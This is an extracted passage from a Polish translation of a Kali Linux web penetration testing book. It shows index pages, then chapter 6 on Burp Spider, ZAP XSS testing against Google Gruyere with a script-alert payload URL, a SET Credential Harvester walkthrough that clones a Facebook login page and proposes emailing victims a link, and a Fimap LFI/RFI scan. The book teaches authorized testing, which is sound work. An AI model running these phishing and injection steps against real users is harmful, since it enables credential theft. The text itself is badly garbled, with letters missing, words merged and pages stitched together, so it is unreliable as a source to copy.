getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 18: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

